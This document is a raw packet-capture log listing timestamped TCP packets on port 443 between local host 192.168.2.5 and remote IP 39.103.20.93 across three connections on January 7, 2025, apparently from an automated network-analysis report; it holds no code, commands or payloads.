                                                  Jan 7, 2025 09:59:30.452409029 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452456951 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452533960 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452574015 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.452637911 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.452685118 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.453370094 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.453425884 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.453474998 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.453520060 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.454380989 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.454421043 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.454437017 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.454442024 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.454456091 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.454478979 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.454998970 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.455054998 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.455140114 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.455184937 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.455281019 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.455327988 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.456058979 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.456115007 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.457818031 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.457865953 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.457906008 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.457951069 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.538575888 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.538651943 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.538666010 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.538708925 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.538711071 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.538749933 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.544825077 CET49979443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.544847012 CET4434997939.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.584692001 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.584758043 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:30.584846020 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.585057020 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:30.585074902 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:31.828018904 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:31.828104973 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:31.828561068 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:31.828568935 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:31.828779936 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:31.828784943 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.163394928 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.163413048 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.163494110 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.163516045 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.163557053 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.164071083 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.164129972 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.165570021 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.165610075 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.165627956 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.165654898 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.165792942 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.165812969 CET4434998039.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.165822983 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.165858984 CET49980443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.177133083 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.177170038 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:32.177237034 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.177427053 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:32.177442074 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.489346981 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.489408970 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:33.489866972 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:33.489871979 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.490071058 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:33.490073919 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.841435909 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.841455936 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.841655016 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.841674089 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:33.841691971 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.841723919 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:33.841743946 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:33.842322111 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:33.842385054 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.064397097 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.064476013 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.064826965 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.064877987 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.065495968 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.065546036 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.065551043 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.065561056 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.065587997 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.066463947 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.066518068 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.066548109 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.066591978 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.067440987 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.067493916 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.288269043 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.288326025 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.288395882 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.288408041 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.288448095 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.288448095 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.288882971 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.288945913 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.289285898 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.289341927 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.289349079 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.289391994 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.290029049 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.290086031 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.290158033 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.290205002 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.290925026 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.290980101 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.291066885 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.291095018 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.291114092 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.291119099 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.291129112 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.291156054 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.291812897 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.291870117 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.291943073 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.291985035 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.292704105 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.292762041 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.292851925 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.292897940 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.515352011 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.515417099 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.515434027 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.515444040 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.515480042 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.515494108 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.515505075 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.515552998 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.515921116 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.515975952 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516092062 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516138077 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516206026 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516253948 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516644955 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516693115 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516719103 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516762972 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516869068 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516901970 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516917944 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516922951 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.516947031 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.516957998 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.517587900 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.517637968 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.517682076 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.517729998 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.517801046 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.517848969 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.517910957 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.517950058 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.518543005 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.518585920 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.518693924 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.518738031 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.518824100 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.518855095 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.518872976 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.518876076 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.518889904 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.518917084 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.518992901 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.519037962 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.519578934 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.519632101 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.519671917 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.519717932 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.519804001 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.519833088 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.519856930 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.519861937 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.519875050 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.519896030 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.520531893 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.520560980 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.520577908 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.520582914 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.520608902 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.520618916 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.602185965 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.602253914 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.602256060 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.602266073 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.602298021 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.602314949 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.602371931 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.602421999 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.747430086 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747473001 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747504950 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.747507095 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747515917 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747550964 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.747566938 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.747636080 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747688055 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.747751951 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747807980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.747900009 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.747950077 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748126030 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748176098 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748234034 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748282909 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748403072 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748454094 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748518944 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748569965 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748743057 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748775005 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748790979 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748797894 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.748815060 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.748838902 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749146938 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749177933 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749205112 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749209881 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749236107 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749252081 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749283075 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749337912 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749376059 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749403954 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749433994 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749438047 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749449015 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749476910 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.749495983 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.749562979 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752221107 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752260923 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752271891 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752275944 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752305984 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752315044 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752357006 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752404928 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752456903 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752507925 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752712011 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752763987 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752800941 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752851963 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.752947092 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.752995014 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753108025 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753155947 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753246069 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753299952 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753364086 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753415108 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753511906 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753546953 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753560066 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753563881 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753577948 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753590107 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753607988 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753612041 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.753633022 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.753654957 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.754046917 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.754100084 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.754146099 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.754192114 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834227085 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834280014 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834316015 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834316969 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834326982 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834352970 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834378958 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834438086 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834485054 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834520102 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834564924 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834624052 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834673882 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834754944 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834804058 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.834850073 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.834901094 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835010052 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835042000 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835061073 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835067034 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835089922 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835108995 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835223913 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835275888 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835416079 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835468054 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835645914 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835684061 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835700035 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835704088 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835716009 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835731983 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835741997 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835746050 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835755110 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835774899 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835784912 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835803986 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835808992 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.835834980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.835855007 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836189032 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836226940 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836250067 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836253881 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836263895 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836281061 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836289883 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836293936 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836303949 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836323023 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836339951 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836354971 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836359024 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836370945 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836388111 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836400986 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836405039 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836431980 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836458921 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.836669922 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.836725950 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.980592966 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.980653048 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.980696917 CET4434998139.103.20.93192.168.2.5
                                                  Jan 7, 2025 09:59:34.980755091 CET49981443192.168.2.539.103.20.93
                                                  Jan 7, 2025 09:59:34.980884075 CET4434998139.103.20.93192.168.2.5
